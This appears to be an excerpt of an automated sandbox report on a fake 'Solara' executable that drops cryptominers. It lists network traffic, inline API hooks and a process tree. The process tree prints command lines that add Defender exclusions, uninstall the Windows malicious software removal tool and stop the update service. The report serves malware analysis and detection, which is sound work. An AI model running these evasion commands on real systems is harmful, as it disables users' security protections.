| .rsrc | 0x14e7000 | 0x423f0 | 0x42400 | 4d4544f74f875dd64302964ba5b118d9 | False | 0.34380527712264153 | data | 5.609529478350963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x14e7100 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 | English | United States | 0.3433810693256798 |
| RT_GROUP_ICON | 0x1529128 | 0x14 | data | English | United States | 1.1 |
| RT_MANIFEST | 0x1529140 | 0x2ae | XML 1.0 document, ASCII text | English | United States | 0.478134110787172 |
| DLL | Import |
|---|---|
| msvcrt.dll | malloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit |
| shell32.dll | ShellExecuteA |
| kernel32.dll | SetUnhandledExceptionFilter |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-07T16:05:20.422524+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49706 | 140.82.121.4 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 7, 2025 16:05:17.138488054 CET | 50382 | 53 | 192.168.2.5 | 1.1.1.1 |
| Jan 7, 2025 16:05:17.145312071 CET | 53 | 50382 | 1.1.1.1 | 192.168.2.5 |
| Jan 7, 2025 16:05:18.850841045 CET | 51567 | 53 | 192.168.2.5 | 1.1.1.1 |
| Jan 7, 2025 16:05:18.857755899 CET | 53 | 51567 | 1.1.1.1 | 192.168.2.5 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 7, 2025 16:05:17.138488054 CET | 192.168.2.5 | 1.1.1.1 | 0x7b28 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 16:05:18.850841045 CET | 192.168.2.5 | 1.1.1.1 | 0x363 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false |
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Jan 7, 2025 16:05:17.145312071 CET | 1.1.1.1 | 192.168.2.5 | 0x7b28 | No error (0) | github.com | | 140.82.121.4 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:18.857755899 CET | 1.1.1.1 | 192.168.2.5 | 0x363 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:18.857755899 CET | 1.1.1.1 | 192.168.2.5 | 0x363 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:18.857755899 CET | 1.1.1.1 | 192.168.2.5 | 0x363 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:18.857755899 CET | 1.1.1.1 | 192.168.2.5 | 0x363 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:27.483938932 CET | 1.1.1.1 | 192.168.2.5 | 0x7df4 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
                        Jan 7, 2025 16:05:27.483938932 CET | 1.1.1.1 | 192.168.2.5 | 0x7df4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.35 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:27.483938932 CET | 1.1.1.1 | 192.168.2.5 | 0x7df4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.39 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:27.483938932 CET | 1.1.1.1 | 192.168.2.5 | 0x7df4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.23 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:27.483938932 CET | 1.1.1.1 | 192.168.2.5 | 0x7df4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.18 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:27.483938932 CET | 1.1.1.1 | 192.168.2.5 | 0x7df4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.20 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:27.483938932 CET | 1.1.1.1 | 192.168.2.5 | 0x7df4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.19 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:27.483938932 CET | 1.1.1.1 | 192.168.2.5 | 0x7df4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.36 | A (IP address) | IN (0x0001) | false
                        Jan 7, 2025 16:05:27.483938932 CET | 1.1.1.1 | 192.168.2.5 | 0x7df4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.34 | A (IP address) | IN (0x0001) | false
                        • github.com
                        • raw.githubusercontent.com
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49704 | 140.82.121.4 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-07 15:05:18 UTC | 105 | OUT | GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                        Host: github.com
                        Connection: Keep-Alive
                        2025-01-07 15:05:18 UTC | 473 | IN | HTTP/1.1 404 Not Found
                        Server: GitHub.com
                        Date: Tue, 07 Jan 2025 15:05:18 GMT
                        Content-Type: text/html; charset=utf-8
                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                        Cache-Control: no-cache
                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                        X-Frame-Options: deny
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 0
                        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.5 | 49705 | 185.199.108.133 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-07 15:05:19 UTC | 135 | OUT | GET /quivings/Solara/main/Storage/version.txt HTTP/1.1
                        User-Agent: Solara
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
                        2025-01-07 15:05:19 UTC | 803 | IN | HTTP/1.1 404 Not Found
                        Connection: close
                        Content-Length: 14
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        Content-Type: text/plain; charset=utf-8
                        X-GitHub-Request-Id: B54A:3ACEAD:634088:6E9AF8:677D42AF
                        Accept-Ranges: bytes
                        Date: Tue, 07 Jan 2025 15:05:19 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-ewr-kewr1740040-EWR
                        X-Cache: MISS
                        X-Cache-Hits: 0
                        X-Timer: S1736262319.418474,VS0,VE28
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: c77d44a0548b70c662ebc1f547d9827e16e6f190
                        Expires: Tue, 07 Jan 2025 15:10:19 GMT
                        Source-Age: 0
                        2025-01-07 15:05:19 UTC | 14 | IN | Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                        Data Ascii: 404: Not Found


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.5 | 49706 | 140.82.121.4 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-07 15:05:20 UTC | 81 | OUT | GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                        Host: github.com
                        2025-01-07 15:05:20 UTC | 473 | IN | HTTP/1.1 404 Not Found
                        Server: GitHub.com
                        Date: Tue, 07 Jan 2025 15:05:18 GMT
                        Content-Type: text/html; charset=utf-8
                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                        Cache-Control: no-cache
                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                        X-Frame-Options: deny
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 0
                        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin


                        Code Manipulations

                        Function Name | Hook Type | Active in Processes
                        ZwEnumerateKey | INLINE | winlogon.exe, explorer.exe
                        NtQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
                        ZwResumeThread | INLINE | winlogon.exe, explorer.exe
                        NtDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
                        ZwDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
                        NtEnumerateKey | INLINE | winlogon.exe, explorer.exe
                        NtQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe
                        ZwEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
                        ZwQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
                        NtResumeThread | INLINE | winlogon.exe, explorer.exe
                        RtlGetNativeSystemInformation | INLINE | winlogon.exe, explorer.exe
                        NtQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
                        NtEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
                        ZwQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
                        ZwQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe
                        Function Name | Hook Type | New Data
                        ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                        ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                        NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                        ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                        NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                        ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                        ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                        NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                        RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                        NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                        NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                        ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                        ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


                        Target ID:0
                        Start time:10:05:08
                        Start date:07/01/2025
                        Path:C:\Users\user\Desktop\Solara.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Solara.exe"
                        Imagebase:0x400000
                        File size:22'179'840 bytes
                        MD5 hash:A6BF6970741F337BCB700166165C1F30
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:10:05:08
                        Start date:07/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="
                        Imagebase:0x5e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:10:05:08
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\eth.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\eth.exe"
                        Imagebase:0x7ff6e2780000
                        File size:5'468'672 bytes
                        MD5 hash:87C3DD67BFA3009D89F7B45B01D705B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 68%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:5
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\xmr.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\xmr.exe"
                        Imagebase:0x7ff68e980000
                        File size:5'468'672 bytes
                        MD5 hash:154202154E41175E801A698CA940EB0C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 76%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:8
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:10:05:10
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe"
                        Imagebase:0x400000
                        File size:10'967'040 bytes
                        MD5 hash:00A1864355A5EA47902E5757C0D87FD9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 68%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:11
                        Start time:10:05:11
                        Start date:07/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
                        Imagebase:0x5e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:10:05:12
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:10:05:12
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\kx new.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\kx new.exe"
                        Imagebase:0x400000
                        File size:10'948'608 bytes
                        MD5 hash:D9D13FA25E880665FB471A4BE57C494C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 71%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:15
                        Start time:10:05:15
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                        Imagebase:0x620000
                        File size:13'312 bytes
                        MD5 hash:6557BD5240397F026E675AFB78544A26
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 33%, ReversingLabs
                        Has exited:true

                        Target ID:16
                        Start time:10:05:15
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:17
                        Start time:10:05:15
                        Start date:07/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
                        Imagebase:0x5e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:18
                        Start time:10:05:15
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:19
                        Start time:10:05:17
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\Kawpow new.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
                        Imagebase:0x7ff762150000
                        File size:5'471'744 bytes
                        MD5 hash:FB6A3B436E9F9402937D95F755B62F91
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 74%, ReversingLabs
                        Has exited:true

                        Target ID:20
                        Start time:10:05:17
                        Start date:07/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:21
                        Start time:10:05:17
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:22
                        Start time:10:05:17
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\xmr new.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\xmr new.exe"
                        Imagebase:0x7ff652d50000
                        File size:5'471'744 bytes
                        MD5 hash:7D6398EBFB82A24748617189BF4AD691
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 74%, ReversingLabs
                        Has exited:true

                        Target ID:23
                        Start time:10:05:18
                        Start date:07/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:24
                        Start time:10:05:18
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:25
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff6ccb00000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:26
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff6ccb00000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:27
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:28
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:29
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:30
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:31
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:32
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:33
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\wusa.exe
                        Wow64 process (32bit):false
                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff67e9a0000
                        File size:345'088 bytes
                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:34
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\wusa.exe
                        Wow64 process (32bit):false
